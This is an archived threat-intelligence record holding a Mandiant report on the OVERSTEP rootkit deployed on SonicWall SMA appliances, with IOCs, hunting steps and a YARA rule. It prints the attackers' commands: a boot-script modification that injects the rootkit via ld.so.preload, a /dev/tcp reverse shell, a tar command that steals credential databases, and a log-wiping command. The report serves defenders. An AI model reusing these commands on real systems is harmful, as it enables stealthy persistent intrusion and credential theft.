{
	"id": "41118bc2-fc91-45a0-80c0-ac5dbd5bcc5f",
	"created_at": "2026-04-06T00:11:48.911674Z",
	"updated_at": "2026-04-10T03:36:48.515968Z",
	"deleted_at": null,
	"sha1_hash": "59eb6f4ecb8f7286007dcb57343a470435ee997b",
	"title": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 153453,
	"plain_text": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation\r\nCampaign using the OVERSTEP Backdoor\r\nBy Mandiant, Google Threat Intelligence Group\r\nPublished: 2025-07-16 · Archived: 2026-04-05 16:34:02 UTC\r\nWritten by: Josh Goddard, Zander Work, Dimiter Andonov\r\nUPDATE (Sep 16): Clarified hunting guidance specifics surrounding ld.so.preload files.\r\nUPDATE (July 30): Added additional network IOC identified by SonicWall as being associated with\r\nOVERSTEP. \r\nIntroduction\r\nGoogle Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access\r\n(SMA) 100 series appliances. GTIG assesses with high confidence that UNC6148 is leveraging credentials and\r\none-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after\r\norganizations have applied security updates. Evidence for the initial infection vector was limited, as the actor's\r\nmalware is designed to selectively remove log entries, hindering forensic investigation; however, it is likely this\r\nwas through the exploitation of known vulnerabilities.\r\nIn this new wave of activity, the actor has deployed a previously unknown persistent backdoor/user-mode rootkit,\r\nwhich GTIG tracks as OVERSTEP. Based on findings from Mandiant Incident Response engagements, our\r\nanalysis shows this malware modifies the appliance's boot process to maintain persistent access, steal sensitive\r\ncredentials, and conceal its own components. 
GTIG assesses with moderate confidence that UNC6148 may have\r\nused an unknown zero-day remote code execution vulnerability to deploy OVERSTEP on opportunistically\r\ntargeted SonicWall SMA appliances.\r\nGTIG assesses with moderate confidence that UNC6148's operations, dating back to at least October 2024, may\r\nbe to enable data theft and extortion operations, and possibly ransomware deployment. An organization targeted\r\nby UNC6148 in May 2025 was posted to the \"World Leaks\" data leak site (DLS) in June 2025, and UNC6148\r\nactivity overlaps with publicly reported SonicWall exploitation from late 2023 and early 2024 that has been\r\npublicly linked to the deployment of Abyss-branded ransomware (tracked by GTIG as VSOCIETY).\r\nGiven the risk of recompromise using previously stolen credentials, organizations should follow the\r\nrecommendations within this post to hunt for potential compromises and rotate all credentials, even if their\r\nappliances are fully patched. This blog post provides technical details on the OVERSTEP rootkit and the\r\nUNC6148 campaign to aid defenders in mitigating this threat.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/\r\nPage 1 of 11\n\nInitial SMA Exploitation to Gain Administrator Credentials\r\nMandiant's first observations of UNC6148 in a recent investigation showed that they already had local\r\nadministrator credentials to the targeted SMA 100 series appliance, and neither forensic evidence nor other data\r\nwas identified to show how those credentials were obtained. GTIG assesses with high confidence that UNC6148\r\nexploited a known vulnerability to steal administrator credentials prior to the targeted SMA appliance being\r\nupdated to the latest firmware version ( 10.2.1.15-81sv ), based on the patching timeline and public reporting of\r\nSonicWall n-day exploitation activity throughout 2025. 
Analysis of network traffic metadata records suggests that\r\nUNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025.\r\nPublic reporting from SonicWall and multiple security firms has highlighted several different vulnerabilities that\r\ncould possibly have been exploited by UNC6148:\r\nCVE-2021-20038: Unauthenticated remote code execution (SonicWall advisory, Truesec report,\r\nAttackerKB entry)\r\nThis is a memory corruption vulnerability that can be executed to gain code execution; however,\r\nRapid7's public exploit can make up to 200,000 HTTP requests and could take over an hour to\r\nexecute, suggesting a widespread campaign may not take advantage of this vulnerability.\r\nTruesec identified this as a plausible entrypoint for intrusion activity they observed in late 2023\r\ntargeting a SonicWall SMA.\r\nCVE-2024-38475: Unauthenticated path traversal vulnerability in Apache HTTP Server, which affected the\r\nSMA 100 series (SonicWall advisory, Orange CyberDefense/SCRT blog post)\r\nThis can be exploited on the SMA 100 series specifically to exfiltrate two different SQLite\r\ndatabases, temp.db and persist.db , which store sensitive information including user account\r\ncredentials, session tokens, and OTP seed values.\r\nwatchTowr published a blog post in May 2025 describing how this vulnerability can be chained\r\nwith another bug, CVE-2023-44221, to compromise an SMA 100 series appliance; however, we did\r\nnot identify any evidence suggesting this bug chain was used by UNC6148.\r\nCVE-2021-20035: Authenticated remote code execution vulnerability (SonicWall advisory, ArcticWolf\r\nreport)\r\nThis is a command injection vulnerability in the handler for /cgi-bin/sitecustomization POST\r\nrequests.\r\nArctic Wolf and SonicWall reported on this vulnerability being exploited in the wild in April 2025.\r\nCVE-2021-20039: Authenticated remote code execution vulnerability (SonicWall advisory, dfir.ch blog\r\npost, 
AttackerKB entry)\r\nThis is a command injection vulnerability in the request handler for /cgi-bin/viewcert .\r\ndfir.ch reported this vulnerability being used to exploit SonicWall SMAs in an intrusion that led to\r\nthe deployment of Abyss-branded ransomware in March 2024, with similar intrusion artifacts to\r\nMandiant's investigation.\r\nCVE-2025-32819: Authenticated file deletion vulnerability (SonicWall advisory, Rapid7 report)\r\nUsing a crafted HTTP request, this vulnerability can be exploited to cause a targeted SonicWall\r\nSMA to revert the built-in administrator credentials to password , granting the attacker\r\nadministrator access.\r\nThere are several different paths UNC6148 could have taken with the aforementioned vulnerabilities, or possibly a\r\ndifferent vulnerability not mentioned here. CVE-2024-38475 would have provided local administrator credentials\r\nand valid session tokens that UNC6148 could reuse, making it an attractive target, but Mandiant was not able to\r\nconfirm abuse of that vulnerability. Exploitation of the previously mentioned authenticated bugs would require\r\nUNC6148 to already have some level of credentials to the SMA appliance, making them less likely to have been\r\nabused, but still worth mentioning due to their in-the-wild exploited status. 
It is also possible that credentials could\r\nhave been obtained through infostealer logs or credential marketplaces, but GTIG was unable to identify any\r\ndirect credential exposure related to the abused SMA appliance credentials.\r\nSubsequent SMA Compromise and OVERSTEP Deployment\r\nMandiant's aforementioned investigation showed that in June 2025, UNC6148 established a Secure Sockets Layer\r\nvirtual private network (SSL VPN) session on the targeted SMA 100 series appliance using the mentioned local\r\nadministrator credentials from a BitLaunch (BLNWX) VPS (193.149.180.50). \r\nOnce the SSL VPN session was established, the attacker spawned a reverse shell on the targeted SMA appliance.\r\nShell access should not be possible by design on these appliances, and Mandiant's joint investigation with the\r\nSonicWall Product Security Incident Response Team (PSIRT) did not identify how UNC6148 established this\r\nreverse shell. It's possible the reverse shell was established via exploitation of an unknown vulnerability by\r\nUNC6148.\r\nThrough the reverse shell, UNC6148 performed initial reconnaissance and file manipulation using a variety of\r\nbuilt-in system binaries such as cat , chmod , cp , date , hostname , mkdir , mount , mv , and rm .\r\nMandiant also observed the actor export and import settings to the SMA appliance, along with new network\r\naccess control policy rules created for IP addresses used by UNC6148, suggesting they may have modified an\r\nexported settings file offline to include new rules for their infrastructure to ensure uninterrupted operations.\r\nFollowing this initial activity, the attacker deployed the OVERSTEP backdoor. 
This process involved executing a\r\nseries of commands to decode the binary from Base64 into the persistent /cf directory with the filename\r\nxxx.elf , moving it to /usr/lib/libsamba-errors.so.6 , and ensuring persistence by adding its path to\r\n/etc/ld.so.preload .\r\ncd /cf; touch xxx.elf;\r\nopenssl enc -base64 -d [REDACTED] \u003e\u003exxx.elf;\r\nchmod 777 /usr/lib/libsamba-errors.so.6;\r\ntouch -c /usr/lib/libsamba-errors.so.6 -r\r\necho /usr/lib/libsamba-errors.so.6 \u003e /etc/ld.so.preload;\r\nchown root:root /usr/lib/libsamba-errors.so.6;\r\nchmod 777 /usr/lib/libsamba-errors.so.6;\r\ntouch -c /usr/lib/libsamba-errors.so.6 -r\r\necho /usr/lib/libsamba-errors.so.6 \u003e /etc/ld.so.preload;\r\narp\r\nFigure 1: Selection of attacker shell commands executed on the appliance\r\nNext, UNC6148 modified the legitimate RC file /etc/rc.d/rc.fwboot to achieve persistence for OVERSTEP.\r\nThe changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the\r\nrunning filesystem on the appliance. Specifically, the bootCurrentFirmware function in the rc.fwboot script\r\nwas modified to include code that performed the following:\r\nCreated a temporary directory named zzz within the present firmware directory. This directory served as\r\na staging area to unpack, modify, and repack the INITRD image. It was a preparatory step for injecting\r\nmalicious content without directly overwriting critical system files during runtime.\r\nDecompressed the INITRD.GZ file, which was the compressed initial RAM disk image. The decompressed\r\nfile was named INITRD , which contains the minimal root filesystem that is loaded into memory during the\r\nboot process before the actual root filesystem is mounted. 
Modifying this image allowed the attacker to\r\ninject malicious files that will be present and executable early in the boot sequence, making it difficult to\r\ndetect and remove.\r\nMounted the decompressed INITRD file as a loop device to the newly created $fwLoc/zzz directory. This\r\nmade the contents of the INITRD file accessible and modifiable as if it were a regular filesystem. This was\r\nan important step that allowed the script to browse and modify the contents of the initial RAM disk.\r\nCopied the file libsamba-errors.so.6 from /cf/ into the mounted INITRD directory /usr/lib/ .\r\nChanged the owner and group of the file libsamba-errors.so.6 to root:root . This sets the permissions\r\nto mimic legitimate system libraries, which are typically owned by root .\r\nChanged the file permissions of the copied malicious library to 0777 (read, write, and execute for owner,\r\ngroup, and others).\r\nEmployed a timestomping technique, attempting to copy the modification timestamp from the legitimate\r\nfile libsamba-errors.so to the malicious file libsamba-errors.so.6 . The goal was to make the\r\nmalicious file appear as if it were part of the original system installation, thereby hindering detection and\r\ninvestigation.\r\nWrote the path to the malicious file /usr/lib/libsamba-errors.so.6 into the ld.so.preload file\r\nlocated within the INITRD directory /etc/ . 
This causes dynamic executables to load the OVERSTEP\r\nshared object file, providing persistence and privileged execution in system processes.\r\nCleaned up temporary modifications, including:\r\nFlushing pending disk writes to ensure all changes to the INITRD file were saved\r\nUnmounting the INITRD file from the temporary directory\r\nRecompressing the modified INITRD file\r\nRemoving the temporary directory\r\nRenamed the newly compressed INITRD to INITRD.GZ , matching the expected filename.\r\nChanged the timestamps of the modified INITRD.GZ file to match those of the kernel image file,\r\nBZIMAGE . This was another timestomping operation to hinder detection and investigation. \r\nLoaded the kernel image BZIMAGE and the modified initial RAM disk, INITRD.GZ , into memory for a\r\nnew kernel execution. It also appended kernel boot options from LINUX.OPT . This prepared the system to\r\nboot into the modified firmware. The use of kexec allowed the running Linux kernel to boot another\r\nLinux kernel without a full hardware reboot.\r\nExecuted the newly loaded kernel by initiating a soft reboot.\r\nIn summary, the code took advantage of the system's boot process to inject a persistent rootkit. By modifying the\r\nINITRD file and leveraging ld.so.preload , the attacker ensured their malicious code would be loaded and\r\nexecuted every time any dynamic executable starts, providing them with privileged and persistent control of the\r\nappliance.\r\nfunction bootCurrentFirmware()\r\n{\r\necho \"$FUNCNAME: begin\" \u003e\u003e $LOGFILE\r\nfwLoc=/cf/firmware/current\r\n \r\nif [ ! 
-f $fwLoc/BZIMAGE ]; then\r\n echo \"Can't locate the kernel image\" \u003e\u003e $LOGFILE;\r\nelif [ -f $fwLoc/INITRD ]; then\r\n echo \"Can't locate the filesystem image\" \u003e\u003e $LOGFILE;\r\nelse\r\n mkdir $fwLoc/zzz\r\n gzip -d $fwLoc/INITRD.GZ\r\n mount -o loop $fwLoc/INITRD $fwLoc/zzz\r\n \r\n cp /cf/libsamba-errors.so.6\r\n$fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6\r\n touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r\r\n$fwLoc/zzz/usr/lib/libsamba-errors.so\r\n echo /usr/lib/libsamba-errors.so.6 \u003e $fwLoc/zzz/etc/ld.so.preload\r\n \r\nsync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz\r\n mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r\r\n$fwLoc/BZIMAGE\r\n \r\n /usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ\r\n--append=\"`cat $fwLoc/LINUX.OPT`\"\r\n /usr/local/sbin/kexec -e;\r\nfi\r\n \r\necho \"$FUNCNAME: end\" \u003e\u003e $LOGFILE\r\n}\r\nFigure 2: Modified function in the rc.fwboot file to provide persistence for OVERSTEP\r\nOnce the deployment of OVERSTEP was complete, the threat actor cleared the system logs and rebooted the\r\nappliance to trigger the execution of OVERSTEP.\r\nAnalysis of OVERSTEP\r\nOVERSTEP is a backdoor written in C, designed for SonicWall SMA 100 series appliances; observed samples\r\nhave been compiled as a 32-bit ELF shared object for the Intel x86 architecture. This shared object is designed to\r\nbe loaded into processes via the /etc/ld.so.preload file. When preloaded in this manner, the malicious library\r\nis mapped into the address space of subsequently launched processes. 
This preloading enables the malware to\r\nhijack standard library functions—specifically open , open64 , readdir , readdir64 , and write —by\r\nensuring these symbols are resolved from the malicious shared object before the legitimate system libraries. The\r\nbackdoor's primary functionalities are to establish a reverse shell and exfiltrate passwords from the compromised\r\nhost. Additionally, the malware implements usermode rootkit capabilities by leveraging its hooked file system-related functions ( open , open64 , readdir , readdir64 ) to effectively hide its components on the host.\r\nCommunications with the command-and-control (C2 or C\u0026C) server are indirect, relying on parsing commands\r\nfrom buffers intercepted by the malicious write API.\r\nThe path to the malicious shared object was added to the /etc/ld.so.preload file, which effectively ensures the\r\nmalware will persist on the compromised appliance. Due to its inclusion in the /etc/ld.so.preload file, the\r\nmalware's shared object is mapped into every new process executed on the compromised system. Upon being\r\nmapped, the malware gains execution through its initialization routine, specifically via its exported my_init\r\nfunction. This my_init function then sets the FS_IMMUTABLE_FL flag on /etc/ld.so.preload , effectively\r\npreventing its modification, deletion, renaming, or the creation of links to it. This preloading mechanism enables\r\nthe malware to perform LD_PRELOAD hijacking, interposing its own versions of the following standard library\r\nfunctions: open , open64 , readdir , readdir64 , and write . The hijacked open* and readdir * APIs are\r\nleveraged to implement a usermode rootkit, concealing the malware's presence and components. The core\r\nbackdoor functionality, conversely, is implemented within the hooked write function. 
The rootkit and backdoor\r\nfunctionalities are described in greater detail in the subsequent sections.\r\nUsermode Rootkit\r\nThe hijacked open and open64 API functions, which typically specify a file path and access mode, are\r\nmanipulated by the malware. The malware's implementation of these functions checks if the requested file path is\r\n/etc/ld.so.preload . If a match occurs, it returns an error code, thereby preventing any process on the\r\ncompromised system from opening this critical file.\r\nThe hijacked readdir and readdir64 API functions are used to conceal the following artifacts from directory\r\nlistings:\r\n/proc entries related to bash , sh , or ssh  \r\nlibsamba-errors.so.6 (the filename of the malware observed on this particular system) \r\n/etc/ld.so.preload\r\nBackdoor\r\nThe backdoor's command execution mechanism is centered on its hijacked write API function. The standard\r\nwrite API receives a buffer containing data destined for an I/O stream. In this implementation, the malicious\r\nwrite function examines the first 1024 bytes of this buffer, searching for the command strings dobackshell or\r\ndopasswords . If either string is detected, the malware expects to find associated command parameters\r\nimmediately following it.\r\ndobackshell\r\nStarts a reverse shell using the command bash -i \u003e\u0026 /dev/tcp/\u003cip\u003e/\u003cport\u003e 0\u003e\u00261 \u0026 .\r\nParameters: IP address and port.\r\ndopasswords\r\nCreates a TAR archive with the provided \u003cfilename\u003e, bundling sensitive files using the command in\r\nFigure 3. Notably, the TAR archive is saved in the web-accessible directory\r\n/usr/src/EasyAccess/www/htdocs with permissive 777 permissions. 
This allows an attacker to\r\ndownload the archive via a web browser.\r\nParameters: Filename of the TAR archive.\r\ntar czfP /usr/src/EasyAccess/www/htdocs/\u003cfilename\u003e.tgz\r\n/tmp/temp.db /etc/EasyAccess/var/conf/persist.db\r\n/etc/EasyAccess/var/cert; chmod 777\r\n/usr/src/EasyAccess/www/htdocs/\u003cfilename\u003e.tgz\r\nFigure 3: Shell commands executed by the dopasswords OVERSTEP command\r\nFollowing the parsing and execution of a command, the malware attempts to remove corresponding entries from\r\naffected log files. This cleanup is performed using the sed command: sed -i '/\u003ccmd\u003e/d'\r\n/var/log/\u003clog_file\u003e , where \u003ccmd\u003e is either dobackshell or dopasswords . The targeted \u003clog_file\u003e can be\r\nhttpd.log , http_request.log , or inotify.log . This log cleaning process is only initiated if the malware can\r\nsuccessfully elevate its privileges by setting its UID and GID to 0 .\r\nReceiving Commands\r\nThe malware was designed to receive commands embedded within web requests. For instance, a legitimate\r\nhttpd server might receive a URL (e.g., https://\u003ccompromised_server\u003e/query?q=dobackshell\u003cparams\u003e )\r\ncontaining the command and its parameters. The server would then attempt to log this request to files such as\r\nhttpd.log , http_request.log , or inotify.log . At this juncture, because the malicious shared object is\r\npreloaded into the httpd process's address space, the call to write is intercepted. The malicious write\r\nfunction then parses the log data and dispatches any recognized command. 
While, technically, write operations\r\nfrom any process could be used to deliver commands, this web server log vector is likely the intended and most\r\npractical method from an attacker's perspective.\r\nRisk and Post-Compromise Activities\r\nIn our investigations, GTIG observed beaconing traffic from compromised appliances, but we did not identify\r\nnotable post-compromise activities. The actor's success in hiding their tracks is largely due to OVERSTEP's\r\ncapability to selectively delete log entries from httpd.log , http_request.log , and inotify.log . This anti-forensic measure, combined with a lack of shell history on disk, significantly reduces visibility into the actor's\r\nsecondary objectives.\r\nThe primary risk stems from OVERSTEP's functionality to steal sensitive files. Its ability to exfiltrate the\r\npersist.db database and certificate files from the /etc/EasyAccess/var/cert directory gives the attacker\r\ncredentials, OTP seeds, and certificates. While we did not directly observe the weaponization of this stolen data, it\r\ncreates a clear path for persistent access.\r\nImpacted organizations should rotate all secrets stored on the appliances and follow the recommendations in this\r\narticle.\r\nWider Context and Campaigns\r\nThis campaign extends beyond the incidents GTIG directly investigated. We have identified targeting of other\r\nSonicWall SMA appliances by UNC6148, including possible scanning activity dating back to at least October\r\n2024. 
Our findings are also supported by SonicWall, which has confirmed reports of other impacted organizations\r\nand subsequently updated its advisory for CVE-2024-38475 to recommend OTP seed rotation.\r\nWhile GTIG has not directly observed monetization or other end-stage goals associated with this campaign,\r\nanalysis of historical network telemetry data revealed traffic involving an SMA 100 series appliance in May 2025\r\naffiliated with an organization that later appeared on the \"World Leaks\" DLS in June 2025; however, we cannot\r\nrule out coincidental overlap at this time.\r\nAdditionally, UNC6148 activity has noteworthy overlaps with historical analysis from Truesec and dfir.ch, which\r\ninvolved the deployment of Abyss-branded ransomware. These overlaps, which suggest that UNC6148 is the same\r\nactor or a related one, further indicate that these intrusions could ultimately lead to data extortion and ransomware\r\ndeployment.\r\nThe OVERSTEP backdoor and deployment mechanism observed by Mandiant appear to be a direct\r\nevolution of the wafxSummary tool reported by Truesec in late 2023.\r\nA dfir.ch blog post from early 2024 describes an intrusion where nearly a year went by between the\r\ndeployment of the wafxSummary tool Truesec wrote about, and the deployment of Abyss-branded\r\nransomware. This is consistent with the 6-month+ time gap between initial UNC6148 activity and the\r\ndeployment of OVERSTEP in our recent investigation.\r\nRecommendations\r\nGTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been\r\ncompromised. Organizations should acquire disk images for forensic analysis to avoid interference from the\r\nrootkit's anti-forensic capabilities. 
Organizations may need to engage with SonicWall to capture disk images from\r\nphysical appliances.\r\nHunting and Detection\r\nDefenders should analyze disk images and peripheral log sources for the following signs of compromise:\r\nFile System Artifacts\r\nPresence of any indicators of compromise (IOCs) listed in this report.\r\nUnexpected binaries within the persistent /cf directory or within INITRD files, especially in the\r\n/usr/lib directory. In our investigations, GTIG observed OVERSTEP residing in these\r\ndirectories.\r\nPresence of the file /etc/ld.so.preload on a disk image with greater than 2 bytes of contents.\r\nThis file should not exist with actual contents on a standard SMA appliance, and the rootkit will\r\nhide it from a live system.\r\nMalicious modifications to RC scripts, most notably the /etc/rc.d/rc.fwboot script.\r\nFiles with irregular timestamps within the INITRD image ( /cf/firmware/ ).\r\nLog and Network Analysis\r\nWeb requests to the appliance containing dobackshell or dopasswords in the URL query.\r\nAppliance event logs showing VPN sessions from external IP addresses (especially from low-reputation networks like BLNWX) using administrator accounts.\r\nOutbound HTTP network traffic from the appliance to external IP addresses.\r\nLog entries for Current settings exported , Current settings imported , or Clear all logs\r\nmanually occurring outside of scheduled maintenance windows.\r\nIrregular activity or threats within other log files from the appliances, including from inside the\r\nFLASH.DAT files ( current and backup ).\r\nEvidence of lateral movement, primarily over Secure Shell (SSH), from the SMA appliance to other\r\nsystems in the environment.\r\nContainment and Eradication\r\nIf evidence of compromise is detected, organizations should take immediate steps to contain the 
threat.\r\nIsolate the affected appliance from the network to prevent further malicious activity.\r\nPreserve disk images and telemetry for a full forensic investigation.\r\nBecause the full extent of an actor's activity can be difficult to determine, GTIG recommends engaging\r\nMandiant Incident Response for a thorough investigation to ensure complete scoping and eradication.\r\nHardening and Mitigation\r\nTo mitigate the immediate threat and harden appliances against future attacks, organizations should:\r\nReset all credentials, including passwords and OTP bindings for all local and directory users on the\r\nappliance. This is the most critical step to invalidate secrets stolen in previous compromises.\r\nRevoke and reissue any certificates with private keys stored on the appliance.\r\nIndicators of Compromise (IOCs)\r\nHost-Based IOCs\r\nPath(s) | SHA256 Hash | Description\r\n/cf/xxx.elf, /cf/libsamba-errors.so.6, /usr/lib/libsamba-errors.so.6 | b28d57269fe4cd90d1650bde5e9056116de26d211966262e59359d0e2a67d473 | OVERSTEP\r\n/etc/rc.d/rc.fwboot | f0e0db06ca665907770e2202957d3eccd5a070acac1debaf0889d0d48c10e149 | Modified legitimate boot RC file\r\nNetwork-Based IOCs\r\nIndicator | Description\r\n193.149.180.50 | Source of VPN sessions where compromise occurred (used by UNC6148 between at least May 2025 and June 2025)\r\n64.52.80.80 | Reverse shell IP (used by UNC6148 between at least February 2025 and June 2025)\r\n193.149.176.230 | Identified by SonicWall as triggering the OVERSTEP backdoor in July 2025\r\nDetections\r\nYARA Rule\r\nrule G_Backdoor_OVERSTEP_1 {\r\nmeta:\r\nauthor = \"Google Threat Intelligence Group\"\r\ndate_created = \"2025-06-03\"\r\ndate_modified = \"2025-06-03\"\r\nrev = 1\r\nstrings:\r\n$s1 = \"dobackshell\"\r\n$s2 = \"dopasswords\"\r\n$s3 = \"bash -i \u003e\u0026 /dev/tcp/%s 0\u003e\u00261 
\u0026\"\r\n$s4 = \"tar czfP /usr/src/EasyAccess/www/htdocs/%s.tgz /tmp/temp.db /etc/EasyAccess/var/conf/persist.db /etc/EasyAccess/var/cert; chmod 777\"\r\n$s5 = \"/etc/ld.so.preload\"\r\n$s6 = \"libsamba-errors.so.6\"\r\ncondition:\r\nuint32(0) == 0x464c457f and filesize \u003c 2MB and 4 of them\r\n}\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/sonicwall-secure-mobile-access-exploitation-overstep-backdoor/"
	],
	"report_names": [
		"sonicwall-secure-mobile-access-exploitation-overstep-backdoor"
	],
	"threat_actors": [
		{
			"id": "eb01bdec-5c18-4479-b343-cf58076dacf1",
			"created_at": "2024-08-10T02:02:56.273673Z",
			"updated_at": "2026-04-10T02:00:03.773129Z",
			"deleted_at": null,
			"main_name": "GOLD CRESCENT",
			"aliases": [
				"Hunters International",
				"World Leaks"
			],
			"source_name": "Secureworks:GOLD CRESCENT",
			"tools": [
				"Hunters International",
				"SharpRhino"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "95e3a0a8-f981-4abc-a2ff-7cdaa31aee6e",
			"created_at": "2026-01-20T02:00:03.66064Z",
			"updated_at": "2026-04-10T02:00:03.912119Z",
			"deleted_at": null,
			"main_name": "UNC6148",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6148",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434308,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.pdf",
		"text": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.txt",
		"img": "https://archive.orkl.eu/59eb6f4ecb8f7286007dcb57343a470435ee997b.jpg"
	}
}